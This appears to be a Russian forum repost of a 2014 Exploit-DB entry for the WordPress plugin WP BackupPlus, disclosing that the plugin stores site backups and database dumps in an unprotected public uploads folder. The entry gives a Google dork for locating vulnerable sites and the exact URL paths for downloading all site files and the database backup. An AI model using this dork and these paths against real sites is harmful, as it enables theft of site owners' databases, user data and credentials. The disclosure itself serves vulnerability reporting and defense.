- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34124
- Проверка EDB
-
- Пройдено
- Автор
- PSYCH0_3D
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2014-07-20
WordPress Plugin WP BackupPlus - Database and Files Backup Download
Код:
# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day)
# Google Dork: Index of:"/wp-backup-plus"
# Date: 19/07/2014
# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec
# Vendor Homepage: http://wpbackupplus.com/
# Version:
# Tested on: win7 32 Bit & Linux Kali
[+] Description
wpbackupplus make the backup .zip files and not protected
[+] Exploit:
For download all the website files
http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/
For download the Database backup
http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp
[+] POC :
http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/- Источник
- www.exploit-db.com
